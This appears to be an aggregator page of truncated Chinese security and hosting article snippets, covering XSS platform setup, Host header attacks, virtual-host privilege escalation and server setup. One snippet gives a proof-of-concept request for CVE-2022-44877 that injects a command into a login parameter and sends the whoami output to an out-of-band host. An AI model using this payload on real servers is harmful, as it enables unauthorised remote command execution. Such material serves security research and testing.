1. 在网站WWW目录下新建一个新的xss目录mkdir /var/www/xss2. 从GitHub上克隆xss平台的源码到本地gitclone https://github.com/...
记一次对虚拟主机的应急响应
免责声明:由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立...
Control Web Panel Linux 虚拟主机控制面板 RCE CVE-2022-44877
POC:POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Hos...
【原创 精华 超详细】虚拟主机转到服务器搭建网站全过程
[huayang] 一些别的设置参照以下文章 【原创】关于wordpress以及H-Siren主题的一些改动和解决办法 【原创】关于Argon 主题添加的一部分扩展详情 【原创 精华】网站建设的一些问...
那些过时的安全技术
来自公众号:信安之路随着网络架构、技术工具的发展,十多年前使用的一些技术已经退出大家的视野,今天来给大家分享几个曾经使用过的工具和技术,如今已经很少见了。1、在 Burp 出来之前,如何截断文件名上传...
回忆杀 | 那些过时的安全技术
随着网络架构、技术工具的发展,十多年前使用的一些技术已经退出大家的视野,今天来给大家分享几个曾经使用过的工具和技术,如今已经很少见了。1、在 Burp 出来之前,如何截断文件名上传文件呢?在有了 Bu...
PaaS服务从heroku迁移到Fly.io小计
今年8月得知了Heroku将要在今年11月彻底下线免费服务,我只有少量服务放在Heroku上,所以没有太在意,直到10月感觉到不得不开始做迁移相关的工作了,于是开始着手准备,并有了这篇文章。这篇文章纯...
技术干货 | Web漏洞:Host头部攻击
在HTTP的请求报文中,我们经常会看到Host字段,如下GET /test/ HTTP/1.1Host: www.baidu.comConnection: keep-aliveUpgrad...
Windows常见可读写目录的探测
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与...
白嫖cdn及主机活动
首先在这里对关注本公众号的粉丝们说一声抱歉。没有更新什么技术文章。但是这波羊毛是很想推荐给你们的。站长人挺不错的,时不时就会送我服务器那些。服务态度也好,遇到什么问题他都会给你解决的。所以把这个羊毛分...
nginx+php-fpm+虚拟主机及负载均衡的搭建
nginx + php-fpm + 虚拟主机及负载均衡的搭建By:0x584A Date:2015年11月22日 22:48:361 前言今天运气不太好,在做测试的时候CentOS镜像挂了,随后VM1...
【奇技淫巧】虚拟主机提权的两个小技巧
是否大家遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的 "拒绝访问"?原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:progra~1和c:windowssystem32)...